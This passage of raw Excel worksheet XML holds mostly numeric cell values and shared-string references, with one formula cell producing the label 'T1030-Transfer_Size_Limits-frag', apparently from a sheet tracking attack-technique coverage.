      <c r="GU11" s="108">
        <v>0</v>
      </c>
      <c r="GV11" s="109">
        <v>0</v>
      </c>
      <c r="GW11" s="110">
        <v>0</v>
      </c>
      <c r="GX11" s="501">
        <v>0</v>
      </c>
      <c r="GY11" s="187">
        <v>0</v>
      </c>
      <c r="GZ11" s="111">
        <v>0</v>
      </c>
      <c r="HA11" s="112">
        <v>0</v>
      </c>
      <c r="HB11" s="113">
        <v>5</v>
      </c>
      <c r="HC11" s="114" t="s">
        <v>2497</v>
      </c>
      <c r="HD11" s="503">
        <v>2</v>
      </c>
      <c r="HE11" s="115" t="s">
        <v>2498</v>
      </c>
      <c r="HF11" s="115">
        <v>2</v>
      </c>
      <c r="HG11" s="116">
        <v>1</v>
      </c>
      <c r="HH11" s="101">
        <v>0</v>
      </c>
      <c r="HI11" s="102">
        <v>0</v>
      </c>
      <c r="HJ11" s="102">
        <v>0</v>
      </c>
      <c r="HK11" s="103">
        <v>0</v>
      </c>
      <c r="HL11" s="103">
        <v>0</v>
      </c>
      <c r="HM11" s="104">
        <v>0</v>
      </c>
      <c r="HN11" s="105">
        <v>0</v>
      </c>
      <c r="HO11" s="106">
        <v>0</v>
      </c>
      <c r="HP11" s="497">
        <v>0</v>
      </c>
      <c r="HQ11" s="186">
        <v>0</v>
      </c>
      <c r="HR11" s="107">
        <v>0</v>
      </c>
      <c r="HS11" s="108">
        <v>0</v>
      </c>
      <c r="HT11" s="109">
        <v>0</v>
      </c>
      <c r="HU11" s="110">
        <v>0</v>
      </c>
      <c r="HV11" s="501">
        <v>0</v>
      </c>
      <c r="HW11" s="187">
        <v>0</v>
      </c>
      <c r="HX11" s="111">
        <v>0</v>
      </c>
      <c r="HY11" s="112">
        <v>0</v>
      </c>
      <c r="HZ11" s="113">
        <v>20</v>
      </c>
      <c r="IA11" s="114" t="s">
        <v>1932</v>
      </c>
      <c r="IB11" s="503">
        <v>5</v>
      </c>
      <c r="IC11" s="115" t="s">
        <v>1933</v>
      </c>
      <c r="ID11" s="115">
        <v>1</v>
      </c>
      <c r="IE11" s="116">
        <v>5</v>
      </c>
      <c r="IF11" s="250">
        <v>0</v>
      </c>
      <c r="IG11" s="251">
        <v>0</v>
      </c>
      <c r="IH11" s="505">
        <v>0</v>
      </c>
      <c r="II11" s="254">
        <v>0</v>
      </c>
      <c r="IJ11" s="252">
        <v>0</v>
      </c>
      <c r="IK11" s="253">
        <v>0</v>
      </c>
      <c r="IL11" s="101">
        <v>20</v>
      </c>
      <c r="IM11" s="102" t="s">
        <v>1932</v>
      </c>
      <c r="IN11" s="102">
        <v>5</v>
      </c>
      <c r="IO11" s="103" t="s">
        <v>1933</v>
      </c>
      <c r="IP11" s="103">
        <v>1</v>
      </c>
      <c r="IQ11" s="104">
        <v>5</v>
      </c>
      <c r="IR11" s="105">
        <v>0</v>
      </c>
      <c r="IS11" s="106">
        <v>0</v>
      </c>
      <c r="IT11" s="497">
        <v>0</v>
      </c>
      <c r="IU11" s="186">
        <v>0</v>
      </c>
      <c r="IV11" s="107">
        <v>0</v>
      </c>
      <c r="IW11" s="108">
        <v>0</v>
      </c>
      <c r="IX11" s="109">
        <v>20</v>
      </c>
      <c r="IY11" s="110" t="s">
        <v>1932</v>
      </c>
      <c r="IZ11" s="501">
        <v>5</v>
      </c>
      <c r="JA11" s="187" t="s">
        <v>1933</v>
      </c>
      <c r="JB11" s="111">
        <v>1</v>
      </c>
      <c r="JC11" s="112">
        <v>5</v>
      </c>
      <c r="JD11" s="113">
        <v>20</v>
      </c>
      <c r="JE11" s="114" t="s">
        <v>1932</v>
      </c>
      <c r="JF11" s="503">
        <v>5</v>
      </c>
      <c r="JG11" s="115" t="s">
        <v>1933</v>
      </c>
      <c r="JH11" s="115">
        <v>1</v>
      </c>
      <c r="JI11" s="116">
        <v>5</v>
      </c>
      <c r="JJ11" s="101">
        <v>0</v>
      </c>
      <c r="JK11" s="102">
        <v>0</v>
      </c>
      <c r="JL11" s="102">
        <v>0</v>
      </c>
      <c r="JM11" s="103">
        <v>0</v>
      </c>
      <c r="JN11" s="103">
        <v>0</v>
      </c>
      <c r="JO11" s="104">
        <v>0</v>
      </c>
      <c r="JP11" s="105">
        <v>0</v>
      </c>
      <c r="JQ11" s="106">
        <v>0</v>
      </c>
      <c r="JR11" s="497">
        <v>0</v>
      </c>
      <c r="JS11" s="186">
        <v>0</v>
      </c>
      <c r="JT11" s="107">
        <v>0</v>
      </c>
      <c r="JU11" s="108">
        <v>0</v>
      </c>
      <c r="JV11" s="109">
        <v>0</v>
      </c>
      <c r="JW11" s="110">
        <v>0</v>
      </c>
      <c r="JX11" s="501">
        <v>0</v>
      </c>
      <c r="JY11" s="187">
        <v>0</v>
      </c>
      <c r="JZ11" s="111">
        <v>0</v>
      </c>
      <c r="KA11" s="112">
        <v>0</v>
      </c>
      <c r="KB11" s="113">
        <v>0</v>
      </c>
      <c r="KC11" s="114">
        <v>0</v>
      </c>
      <c r="KD11" s="503">
        <v>0</v>
      </c>
      <c r="KE11" s="115">
        <v>0</v>
      </c>
      <c r="KF11" s="115">
        <v>0</v>
      </c>
      <c r="KG11" s="116">
        <v>0</v>
      </c>
      <c r="KH11" s="250">
        <v>0</v>
      </c>
      <c r="KI11" s="251">
        <v>0</v>
      </c>
      <c r="KJ11" s="505">
        <v>0</v>
      </c>
      <c r="KK11" s="254">
        <v>0</v>
      </c>
      <c r="KL11" s="252">
        <v>0</v>
      </c>
      <c r="KM11" s="253">
        <v>0</v>
      </c>
      <c r="KN11" s="101">
        <v>0</v>
      </c>
      <c r="KO11" s="102">
        <v>0</v>
      </c>
      <c r="KP11" s="102">
        <v>0</v>
      </c>
      <c r="KQ11" s="103">
        <v>0</v>
      </c>
      <c r="KR11" s="103">
        <v>0</v>
      </c>
      <c r="KS11" s="104">
        <v>0</v>
      </c>
      <c r="KT11" s="105">
        <v>0</v>
      </c>
      <c r="KU11" s="106">
        <v>0</v>
      </c>
      <c r="KV11" s="497">
        <v>0</v>
      </c>
      <c r="KW11" s="186">
        <v>0</v>
      </c>
      <c r="KX11" s="107">
        <v>0</v>
      </c>
      <c r="KY11" s="108">
        <v>0</v>
      </c>
      <c r="KZ11" s="109">
        <v>0</v>
      </c>
      <c r="LA11" s="110">
        <v>0</v>
      </c>
      <c r="LB11" s="501">
        <v>0</v>
      </c>
      <c r="LC11" s="187">
        <v>0</v>
      </c>
      <c r="LD11" s="111">
        <v>0</v>
      </c>
      <c r="LE11" s="112">
        <v>0</v>
      </c>
      <c r="LF11" s="113">
        <v>0</v>
      </c>
      <c r="LG11" s="114">
        <v>0</v>
      </c>
      <c r="LH11" s="503">
        <v>0</v>
      </c>
      <c r="LI11" s="115">
        <v>0</v>
      </c>
      <c r="LJ11" s="115">
        <v>0</v>
      </c>
      <c r="LK11" s="116">
        <v>0</v>
      </c>
      <c r="LL11" s="117">
        <v>11</v>
      </c>
      <c r="LM11" s="507">
        <v>10</v>
      </c>
      <c r="LN11" s="119">
        <v>3</v>
      </c>
      <c r="LO11" s="119">
        <v>3</v>
      </c>
      <c r="LP11" s="119">
        <v>7</v>
      </c>
      <c r="LQ11" s="119">
        <v>2</v>
      </c>
      <c r="LR11" s="119">
        <v>7</v>
      </c>
      <c r="LS11" s="119">
        <v>7</v>
      </c>
      <c r="LT11" s="382"/>
      <c r="LU11" s="117">
        <v>1</v>
      </c>
      <c r="LV11" s="118" t="s">
        <v>4160</v>
      </c>
      <c r="LW11" s="507">
        <v>1</v>
      </c>
      <c r="LX11" s="119" t="s">
        <v>2536</v>
      </c>
      <c r="LY11" s="119">
        <v>1</v>
      </c>
      <c r="LZ11" s="119">
        <v>1</v>
      </c>
      <c r="MA11" s="117">
        <v>0</v>
      </c>
      <c r="MB11" s="118">
        <v>0</v>
      </c>
      <c r="MC11" s="507">
        <v>0</v>
      </c>
      <c r="MD11" s="119">
        <v>0</v>
      </c>
      <c r="ME11" s="119">
        <v>0</v>
      </c>
      <c r="MF11" s="119">
        <v>0</v>
      </c>
      <c r="MG11" s="117">
        <v>0</v>
      </c>
      <c r="MH11" s="118">
        <v>0</v>
      </c>
      <c r="MI11" s="507">
        <v>0</v>
      </c>
      <c r="MJ11" s="119">
        <v>0</v>
      </c>
      <c r="MK11" s="119">
        <v>0</v>
      </c>
      <c r="ML11" s="119">
        <v>0</v>
      </c>
      <c r="MM11" s="117">
        <v>3</v>
      </c>
      <c r="MN11" s="118" t="s">
        <v>4161</v>
      </c>
      <c r="MO11" s="507">
        <v>2</v>
      </c>
      <c r="MP11" s="119" t="s">
        <v>4162</v>
      </c>
      <c r="MQ11" s="119">
        <v>2</v>
      </c>
      <c r="MR11" s="119">
        <v>2</v>
      </c>
      <c r="MS11" s="117">
        <v>0</v>
      </c>
      <c r="MT11" s="118">
        <v>0</v>
      </c>
      <c r="MU11" s="507">
        <v>0</v>
      </c>
      <c r="MV11" s="119">
        <v>0</v>
      </c>
      <c r="MW11" s="119">
        <v>0</v>
      </c>
      <c r="MX11" s="119">
        <v>0</v>
      </c>
      <c r="MY11" s="117">
        <v>0</v>
      </c>
      <c r="MZ11" s="118">
        <v>0</v>
      </c>
      <c r="NA11" s="507">
        <v>0</v>
      </c>
      <c r="NB11" s="119">
        <v>0</v>
      </c>
      <c r="NC11" s="119">
        <v>0</v>
      </c>
      <c r="ND11" s="119">
        <v>0</v>
      </c>
      <c r="NE11" s="117">
        <v>0</v>
      </c>
      <c r="NF11" s="118">
        <v>0</v>
      </c>
      <c r="NG11" s="507">
        <v>0</v>
      </c>
      <c r="NH11" s="119">
        <v>0</v>
      </c>
      <c r="NI11" s="119">
        <v>0</v>
      </c>
      <c r="NJ11" s="119">
        <v>0</v>
      </c>
      <c r="NK11" s="117">
        <v>0</v>
      </c>
      <c r="NL11" s="118">
        <v>0</v>
      </c>
      <c r="NM11" s="507">
        <v>0</v>
      </c>
      <c r="NN11" s="119">
        <v>0</v>
      </c>
      <c r="NO11" s="119">
        <v>0</v>
      </c>
      <c r="NP11" s="119">
        <v>0</v>
      </c>
      <c r="NQ11" s="117">
        <v>0</v>
      </c>
      <c r="NR11" s="118">
        <v>0</v>
      </c>
      <c r="NS11" s="507">
        <v>0</v>
      </c>
      <c r="NT11" s="119">
        <v>0</v>
      </c>
      <c r="NU11" s="119">
        <v>0</v>
      </c>
      <c r="NV11" s="119">
        <v>0</v>
      </c>
      <c r="NW11" s="117">
        <v>7</v>
      </c>
      <c r="NX11" s="118" t="s">
        <v>4321</v>
      </c>
      <c r="NY11" s="507">
        <v>7</v>
      </c>
      <c r="NZ11" s="119" t="s">
        <v>4163</v>
      </c>
      <c r="OA11" s="119">
        <v>3</v>
      </c>
      <c r="OB11" s="119">
        <v>7</v>
      </c>
      <c r="OC11" s="120">
        <v>5</v>
      </c>
      <c r="OD11" s="120">
        <v>3</v>
      </c>
      <c r="OE11" s="120">
        <v>3</v>
      </c>
      <c r="OF11" s="120">
        <v>2</v>
      </c>
      <c r="OG11" s="120">
        <v>2</v>
      </c>
      <c r="OH11" s="120">
        <v>2</v>
      </c>
      <c r="OI11" s="120">
        <v>2</v>
      </c>
      <c r="OJ11" s="120">
        <v>2</v>
      </c>
      <c r="OK11" s="383"/>
      <c r="OL11" s="120">
        <v>4</v>
      </c>
      <c r="OM11" s="120">
        <v>4</v>
      </c>
      <c r="ON11" s="120">
        <v>2</v>
      </c>
      <c r="OO11" s="120" t="s">
        <v>2575</v>
      </c>
      <c r="OP11" s="120">
        <v>2</v>
      </c>
      <c r="OQ11" s="464">
        <v>2</v>
      </c>
      <c r="OR11" s="120">
        <v>0</v>
      </c>
      <c r="OS11" s="120">
        <v>0</v>
      </c>
      <c r="OT11" s="120">
        <v>0</v>
      </c>
      <c r="OU11" s="120"/>
      <c r="OV11" s="120">
        <v>0</v>
      </c>
      <c r="OW11" s="464">
        <v>0</v>
      </c>
      <c r="OX11" s="120">
        <v>0</v>
      </c>
      <c r="OY11" s="120">
        <v>0</v>
      </c>
      <c r="OZ11" s="120">
        <v>0</v>
      </c>
      <c r="PA11" s="120"/>
      <c r="PB11" s="120">
        <v>0</v>
      </c>
      <c r="PC11" s="464">
        <v>0</v>
      </c>
      <c r="PD11" s="120">
        <v>0</v>
      </c>
      <c r="PE11" s="120">
        <v>0</v>
      </c>
      <c r="PF11" s="120">
        <v>0</v>
      </c>
      <c r="PG11" s="120"/>
      <c r="PH11" s="120">
        <v>0</v>
      </c>
      <c r="PI11" s="464">
        <v>0</v>
      </c>
      <c r="PJ11" s="120">
        <v>1</v>
      </c>
      <c r="PK11" s="120">
        <v>1</v>
      </c>
      <c r="PL11" s="120">
        <v>1</v>
      </c>
      <c r="PM11" s="120" t="s">
        <v>2540</v>
      </c>
      <c r="PN11" s="120">
        <v>1</v>
      </c>
      <c r="PO11" s="464">
        <v>1</v>
      </c>
      <c r="PP11" s="120">
        <v>1</v>
      </c>
      <c r="PQ11" s="120">
        <v>1</v>
      </c>
      <c r="PR11" s="120">
        <v>1</v>
      </c>
      <c r="PS11" s="120" t="s">
        <v>2517</v>
      </c>
      <c r="PT11" s="120">
        <v>1</v>
      </c>
      <c r="PU11" s="464">
        <v>1</v>
      </c>
      <c r="PV11" s="120">
        <v>0</v>
      </c>
      <c r="PW11" s="120">
        <v>0</v>
      </c>
      <c r="PX11" s="120">
        <v>0</v>
      </c>
      <c r="PY11" s="120"/>
      <c r="PZ11" s="120">
        <v>0</v>
      </c>
      <c r="QA11" s="464">
        <v>0</v>
      </c>
      <c r="QB11" s="120">
        <v>0</v>
      </c>
      <c r="QC11" s="120">
        <v>0</v>
      </c>
      <c r="QD11" s="120">
        <v>0</v>
      </c>
      <c r="QE11" s="120"/>
      <c r="QF11" s="120">
        <v>0</v>
      </c>
      <c r="QG11" s="464">
        <v>0</v>
      </c>
      <c r="QH11" s="120">
        <v>4</v>
      </c>
      <c r="QI11" s="120">
        <v>4</v>
      </c>
      <c r="QJ11" s="120">
        <v>1</v>
      </c>
      <c r="QK11" s="120" t="s">
        <v>2542</v>
      </c>
      <c r="QL11" s="120">
        <v>1</v>
      </c>
      <c r="QM11" s="464">
        <v>1</v>
      </c>
      <c r="QN11" s="120">
        <v>0</v>
      </c>
      <c r="QO11" s="120">
        <v>0</v>
      </c>
      <c r="QP11" s="120">
        <v>0</v>
      </c>
      <c r="QQ11" s="120"/>
      <c r="QR11" s="120">
        <v>0</v>
      </c>
      <c r="QS11" s="464">
        <v>0</v>
      </c>
      <c r="QT11" s="184"/>
      <c r="QU11" s="184"/>
      <c r="QV11" s="184"/>
      <c r="QW11" s="184"/>
      <c r="QX11" s="184"/>
      <c r="QY11" s="184"/>
      <c r="QZ11" s="184"/>
      <c r="RA11" s="184"/>
      <c r="RB11" s="184"/>
      <c r="RC11" s="184"/>
      <c r="RD11" s="184"/>
      <c r="RE11" s="184"/>
      <c r="RF11" s="184"/>
      <c r="RG11" s="184"/>
      <c r="RH11" s="184"/>
      <c r="RI11" s="184"/>
      <c r="RJ11" s="184"/>
      <c r="RK11" s="184"/>
      <c r="RL11" s="184"/>
      <c r="RM11" s="184"/>
      <c r="RN11" s="184"/>
      <c r="RO11" s="184"/>
      <c r="RP11" s="184"/>
      <c r="RQ11" s="184"/>
      <c r="RR11" s="184"/>
      <c r="RS11" s="184"/>
      <c r="RT11" s="184"/>
      <c r="RU11" s="184"/>
      <c r="RV11" s="184"/>
      <c r="RW11" s="184"/>
      <c r="RX11" s="184"/>
      <c r="RY11" s="184"/>
      <c r="RZ11" s="184"/>
      <c r="SA11" s="184"/>
      <c r="SB11" s="184"/>
      <c r="SC11" s="184"/>
      <c r="SD11" s="184"/>
      <c r="SE11" s="184"/>
      <c r="SF11" s="184"/>
      <c r="SG11" s="184"/>
      <c r="SH11" s="184"/>
      <c r="SI11" s="184"/>
      <c r="SJ11" s="184"/>
      <c r="SK11" s="184"/>
      <c r="SL11" s="184"/>
      <c r="SM11" s="184"/>
      <c r="SN11" s="184"/>
      <c r="SO11" s="184"/>
      <c r="SP11" s="184"/>
      <c r="SQ11" s="184"/>
      <c r="SR11" s="184"/>
      <c r="SS11" s="184"/>
      <c r="ST11" s="184"/>
      <c r="SU11" s="184"/>
      <c r="SV11" s="184"/>
      <c r="SW11" s="184"/>
      <c r="SX11" s="184"/>
      <c r="SY11" s="184"/>
      <c r="SZ11" s="184"/>
      <c r="TA11" s="184"/>
      <c r="TB11" s="184"/>
      <c r="TC11" s="184"/>
      <c r="TD11" s="184"/>
      <c r="TE11" s="184"/>
      <c r="TF11" s="184"/>
      <c r="TG11" s="184"/>
      <c r="TH11" s="184"/>
      <c r="TI11" s="184"/>
      <c r="TJ11" s="184"/>
      <c r="TK11" s="184"/>
      <c r="TL11" s="184"/>
      <c r="TM11" s="184"/>
      <c r="TN11" s="184"/>
      <c r="TO11" s="184"/>
      <c r="TP11" s="184"/>
      <c r="TQ11" s="184"/>
      <c r="TR11" s="184"/>
      <c r="TS11" s="184"/>
      <c r="TT11" s="184"/>
      <c r="TU11" s="184"/>
      <c r="TV11" s="184"/>
      <c r="TW11" s="184"/>
      <c r="TX11" s="184"/>
      <c r="TY11" s="184"/>
      <c r="TZ11" s="184"/>
      <c r="UA11" s="184"/>
      <c r="UB11" s="184"/>
      <c r="UC11" s="184"/>
      <c r="UD11" s="184"/>
      <c r="UE11" s="184"/>
      <c r="UF11" s="184"/>
      <c r="UG11" s="184"/>
      <c r="UH11" s="184"/>
      <c r="UI11" s="184"/>
      <c r="UJ11" s="184"/>
      <c r="UK11" s="184"/>
      <c r="UL11" s="184"/>
      <c r="UM11" s="184"/>
      <c r="UN11" s="184"/>
      <c r="UO11" s="184"/>
      <c r="UP11" s="184"/>
      <c r="UQ11" s="184"/>
      <c r="UR11" s="184"/>
      <c r="US11" s="184"/>
      <c r="UT11" s="184"/>
      <c r="UU11" s="184"/>
      <c r="UV11" s="184"/>
      <c r="UW11" s="184"/>
      <c r="UX11" s="184"/>
      <c r="UY11" s="184"/>
      <c r="UZ11" s="184"/>
      <c r="VA11" s="184"/>
      <c r="VB11" s="184"/>
      <c r="VC11" s="184"/>
      <c r="VD11" s="184"/>
      <c r="VE11" s="184"/>
      <c r="VF11" s="184"/>
      <c r="VG11" s="184"/>
      <c r="VH11" s="184"/>
      <c r="VI11" s="184"/>
      <c r="VJ11" s="184"/>
      <c r="VK11" s="184"/>
      <c r="VL11" s="184"/>
      <c r="VM11" s="184"/>
      <c r="VN11" s="184"/>
      <c r="VO11" s="184"/>
      <c r="VP11" s="184"/>
      <c r="VQ11" s="184"/>
      <c r="VR11" s="184"/>
      <c r="VS11" s="184"/>
      <c r="VT11" s="184"/>
      <c r="VU11" s="184"/>
      <c r="VV11" s="184"/>
      <c r="VW11" s="184"/>
      <c r="VX11" s="184"/>
      <c r="VY11" s="184"/>
    </row>
    <row r="12" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A12" s="82" t="s">
        <v>14</v>
      </c>
      <c r="B12" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C12" s="83" t="s">
        <v>318</v>
      </c>
      <c r="D12" s="83" t="s">
        <v>27</v>
      </c>
      <c r="E12" s="83">
        <f t="shared" si="2"/>
        <v>9</v>
      </c>
      <c r="F12" s="83" t="s">
        <v>28</v>
      </c>
      <c r="G12" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H12" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I12" s="81" t="s">
        <v>837</v>
      </c>
      <c r="J12" s="85" t="s">
        <v>838</v>
      </c>
      <c r="K12" s="81" t="s">
        <v>839</v>
      </c>
      <c r="L12" s="81" t="s">
        <v>840</v>
      </c>
      <c r="M12" s="378" t="s">
        <v>188</v>
      </c>
      <c r="N12" s="465" t="s">
        <v>2428</v>
      </c>
      <c r="O12" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P12" s="91"/>
      <c r="Q12" s="379" t="s">
        <v>841</v>
      </c>
      <c r="R12" s="92" t="s">
        <v>842</v>
      </c>
      <c r="S12" s="93" t="s">
        <v>843</v>
      </c>
      <c r="T12" s="92" t="s">
        <v>844</v>
      </c>
      <c r="U12" s="94" t="s">
        <v>845</v>
      </c>
      <c r="V12" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W12" s="96" t="s">
        <v>846</v>
      </c>
      <c r="X12" s="97" t="s">
        <v>847</v>
      </c>
      <c r="Y12" s="83" t="s">
        <v>848</v>
      </c>
      <c r="Z12" s="188" t="s">
        <v>849</v>
      </c>
      <c r="AA12" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB12" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC12" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD12" s="83"/>
      <c r="AE12" s="83"/>
      <c r="AF12" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG12" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH12" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI12" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ12" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK12" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL12" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM12" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN12" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO12" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP12" s="385" t="str">
        <f>M12&amp;"-frag"</f>
        <v>T1030-Transfer_Size_Limits-frag</v>
      </c>
      <c r="AQ12" s="358">
        <v>68</v>
      </c>
      <c r="AR12" s="100"/>
      <c r="AS12" s="100">
        <v>1</v>
      </c>
      <c r="AT12" s="100">
        <v>1</v>
      </c>
      <c r="AU12" s="100">
        <v>2</v>
      </c>
      <c r="AV12" s="92" t="s">
        <v>850</v>
      </c>
      <c r="AW12" s="100">
        <v>1</v>
      </c>
      <c r="AX12" s="100">
        <v>1</v>
      </c>
      <c r="AY12" s="100">
        <v>1</v>
      </c>
      <c r="AZ12" s="100">
        <v>2</v>
      </c>
      <c r="BA12" s="381"/>
      <c r="BB12" s="101">
        <v>63</v>
      </c>
      <c r="BC12" s="102" t="s">
        <v>1795</v>
      </c>
      <c r="BD12" s="102">
        <v>32</v>
      </c>
      <c r="BE12" s="103" t="s">
        <v>336</v>
      </c>
      <c r="BF12" s="103">
        <v>1</v>
      </c>
      <c r="BG12" s="104">
        <v>32</v>
      </c>
      <c r="BH12" s="105">
        <v>1</v>
      </c>
      <c r="BI12" s="106" t="s">
        <v>1842</v>
      </c>
      <c r="BJ12" s="497">
        <v>1</v>
      </c>
      <c r="BK12" s="107" t="s">
        <v>1843</v>
      </c>
      <c r="BL12" s="107">
        <v>1</v>
      </c>
      <c r="BM12" s="108">
        <v>1</v>
      </c>
      <c r="BN12" s="109">
        <v>64</v>
      </c>
      <c r="BO12" s="110" t="s">
        <v>1982</v>
      </c>
      <c r="BP12" s="501">
        <v>33</v>
      </c>
      <c r="BQ12" s="111" t="s">
        <v>1983</v>
      </c>
      <c r="BR12" s="111">
        <v>2</v>
      </c>
      <c r="BS12" s="112">
        <v>32</v>
      </c>
      <c r="BT12" s="113">
        <v>63</v>
      </c>
      <c r="BU12" s="114" t="s">
        <v>1795</v>
      </c>
      <c r="BV12" s="503">
        <v>32</v>
      </c>
      <c r="BW12" s="115" t="s">
        <v>336</v>
      </c>
      <c r="BX12" s="115">
        <v>1</v>
      </c>
      <c r="BY12" s="116">
        <v>32</v>
      </c>
      <c r="BZ12" s="250">
        <v>99</v>
      </c>
      <c r="CA12" s="251" t="s">
        <v>2577</v>
      </c>
      <c r="CB12" s="505">
        <v>97</v>
      </c>
      <c r="CC12" s="252" t="s">
        <v>2578</v>
      </c>
      <c r="CD12" s="252">
        <v>7</v>
      </c>
      <c r="CE12" s="253">
        <v>34</v>
      </c>
      <c r="CF12" s="101">
        <v>162</v>
      </c>
      <c r="CG12" s="102" t="s">
        <v>2579</v>
      </c>
      <c r="CH12" s="102">
        <v>129</v>
      </c>
      <c r="CI12" s="103" t="s">
        <v>2580</v>
      </c>
      <c r="CJ12" s="103">
        <v>8</v>
      </c>
      <c r="CK12" s="104">
        <v>34</v>
      </c>
      <c r="CL12" s="105">
        <v>0</v>
      </c>
      <c r="CM12" s="106">
        <v>0</v>
      </c>
      <c r="CN12" s="497">
        <v>0</v>
      </c>
      <c r="CO12" s="107">
        <v>0</v>
      </c>
      <c r="CP12" s="107">
        <v>0</v>
      </c>
      <c r="CQ12" s="108">
        <v>0</v>
      </c>
      <c r="CR12" s="109">
        <v>0</v>
      </c>
      <c r="CS12" s="110">
        <v>0</v>
      </c>
      <c r="CT12" s="501">
        <v>0</v>
      </c>
      <c r="CU12" s="111">
        <v>0</v>
      </c>
      <c r="CV12" s="111">
        <v>0</v>
      </c>
      <c r="CW12" s="112">
        <v>0</v>
      </c>
      <c r="CX12" s="113">
        <v>64</v>
      </c>
      <c r="CY12" s="114" t="s">
        <v>1982</v>
      </c>
      <c r="CZ12" s="503">
        <v>33</v>
      </c>
      <c r="DA12" s="115" t="s">
        <v>1983</v>
      </c>
      <c r="DB12" s="115">
        <v>2</v>
      </c>
      <c r="DC12" s="116">
        <v>32</v>
      </c>
      <c r="DD12" s="101">
        <v>0</v>
      </c>
      <c r="DE12" s="102">
        <v>0</v>
      </c>
      <c r="DF12" s="102">
        <v>0</v>
      </c>
      <c r="DG12" s="103">
        <v>0</v>
      </c>
      <c r="DH12" s="103">
        <v>0</v>
      </c>
      <c r="DI12" s="104">
        <v>0</v>
      </c>
      <c r="DJ12" s="105">
        <v>1</v>
      </c>
      <c r="DK12" s="106" t="s">
        <v>1842</v>
      </c>
      <c r="DL12" s="497">
        <v>1</v>
      </c>
      <c r="DM12" s="107" t="s">
        <v>1843</v>
      </c>
      <c r="DN12" s="107">
        <v>1</v>
      </c>
      <c r="DO12" s="108">
        <v>1</v>
      </c>
      <c r="DP12" s="109">
        <v>1</v>
      </c>
      <c r="DQ12" s="110" t="s">
        <v>1842</v>
      </c>
      <c r="DR12" s="501">
        <v>1</v>
      </c>
      <c r="DS12" s="111" t="s">
        <v>1843</v>
      </c>
      <c r="DT12" s="111">
        <v>1</v>
      </c>
      <c r="DU12" s="112">
        <v>1</v>
      </c>
      <c r="DV12" s="113">
        <v>0</v>
      </c>
      <c r="DW12" s="114">
        <v>0</v>
      </c>
      <c r="DX12" s="503">
        <v>0</v>
      </c>
      <c r="DY12" s="115">
        <v>0</v>
      </c>
      <c r="DZ12" s="115">
        <v>0</v>
      </c>
      <c r="EA12" s="116">
        <v>0</v>
      </c>
      <c r="EB12" s="250">
        <v>2</v>
      </c>
      <c r="EC12" s="251" t="s">
        <v>2581</v>
      </c>
      <c r="ED12" s="505">
        <v>2</v>
      </c>
      <c r="EE12" s="252" t="s">
        <v>2582</v>
      </c>
      <c r="EF12" s="252">
        <v>2</v>
      </c>
      <c r="EG12" s="253">
        <v>2</v>
      </c>
      <c r="EH12" s="101">
        <v>2</v>
      </c>
      <c r="EI12" s="102" t="s">
        <v>2581</v>
      </c>
      <c r="EJ12" s="102">
        <v>2</v>
      </c>
      <c r="EK12" s="103" t="s">
        <v>2582</v>
      </c>
      <c r="EL12" s="103">
        <v>2</v>
      </c>
      <c r="EM12" s="104">
        <v>2</v>
      </c>
      <c r="EN12" s="105">
        <v>0</v>
      </c>
      <c r="EO12" s="106">
        <v>0</v>
      </c>
      <c r="EP12" s="497">
        <v>0</v>
      </c>
      <c r="EQ12" s="107">
        <v>0</v>
      </c>
      <c r="ER12" s="107">
        <v>0</v>
      </c>
      <c r="ES12" s="108">
        <v>0</v>
      </c>
      <c r="ET12" s="109">
        <v>0</v>
      </c>
      <c r="EU12" s="110">
        <v>0</v>
      </c>
      <c r="EV12" s="501">
        <v>0</v>
      </c>
      <c r="EW12" s="111">
        <v>0</v>
      </c>
      <c r="EX12" s="111">
        <v>0</v>
      </c>
      <c r="EY12" s="112">
        <v>0</v>
      </c>
      <c r="EZ12" s="113">
        <v>1</v>
      </c>
      <c r="FA12" s="114" t="s">
        <v>1842</v>
      </c>
      <c r="FB12" s="503">
        <v>1</v>
      </c>
      <c r="FC12" s="115" t="s">
        <v>1843</v>
      </c>
      <c r="FD12" s="115">
        <v>1</v>
      </c>
      <c r="FE12" s="116">
        <v>1</v>
      </c>
      <c r="FF12" s="101">
        <v>63</v>
      </c>
      <c r="FG12" s="102" t="s">
        <v>1795</v>
      </c>
      <c r="FH12" s="102">
        <v>32</v>
      </c>
      <c r="FI12" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ12" s="103">
        <v>1</v>
      </c>
      <c r="FK12" s="104">
        <v>32</v>
      </c>
      <c r="FL12" s="105">
        <v>0</v>
      </c>
      <c r="FM12" s="106">
        <v>0</v>
      </c>
      <c r="FN12" s="497">
        <v>0</v>
      </c>
      <c r="FO12" s="107">
        <v>0</v>
      </c>
      <c r="FP12" s="107">
        <v>0</v>
      </c>
      <c r="FQ12" s="108">
        <v>0</v>
      </c>
      <c r="FR12" s="109">
        <v>63</v>
      </c>
      <c r="FS12" s="110" t="s">
        <v>1795</v>
      </c>
      <c r="FT12" s="501">
        <v>32</v>
      </c>
      <c r="FU12" s="111" t="s">
        <v>336</v>
      </c>
      <c r="FV12" s="111">
        <v>1</v>
      </c>
      <c r="FW12" s="112">
        <v>32</v>
      </c>
      <c r="FX12" s="113">
        <v>63</v>
      </c>
      <c r="FY12" s="114" t="s">
        <v>1795</v>
      </c>
      <c r="FZ12" s="503">
        <v>32</v>
      </c>
      <c r="GA12" s="115" t="s">
        <v>336</v>
      </c>
      <c r="GB12" s="115">
        <v>1</v>
      </c>
      <c r="GC12" s="116">
        <v>32</v>
      </c>
